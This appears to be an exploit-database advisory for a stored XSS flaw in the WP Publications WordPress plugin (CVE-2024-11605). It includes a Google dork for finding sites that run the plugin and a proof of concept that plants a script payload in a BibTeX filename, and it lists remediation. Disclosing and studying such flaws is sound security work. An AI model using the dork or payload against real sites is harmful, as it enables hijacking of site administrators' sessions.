# Exploit Title: WP Publications WordPress Plugin 1.2 - Stored XSS
# Google Dork: inurl:/wp-content/plugins/wp-publications/
# Date: 2025-07-15
# Exploit Author: Zeynalxan Quliyev
# Vendor Homepage: https://wordpress.org/plugins/wp-publications/
# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
# Version: <= 1.2
# Tested on: WordPress 6.5.3 / Linux (Apache)
# CVE: CVE-2024-11605
## Vulnerability Details
The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code.
This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups).
---
## Proof of Concept (PoC)
1. SSH into the server and navigate to the plugin directory:
```bash
cd /var/www/html/wp-content/plugins/wp-publications/
```
2. Run the following command to create a malicious BibTeX file:
```bash
touch "<img src=x onerror=alert('XSS')>.bib"
```
3. Access the plugin's BibTeX browser via the following URL:
```
https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
```
4. The injected JavaScript will be executed, triggering the XSS payload:
```javascript
alert('XSS');
```
---
## Impact
* Stored XSS (JavaScript) is executed in the context of the admin panel.
* Bypasses `unfiltered_html` protection in multisite environments.
* Can be used for privilege escalation, cookie theft, or injecting malicious content.
---
## Recommendation
Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.
---
## References
* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)
* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/)
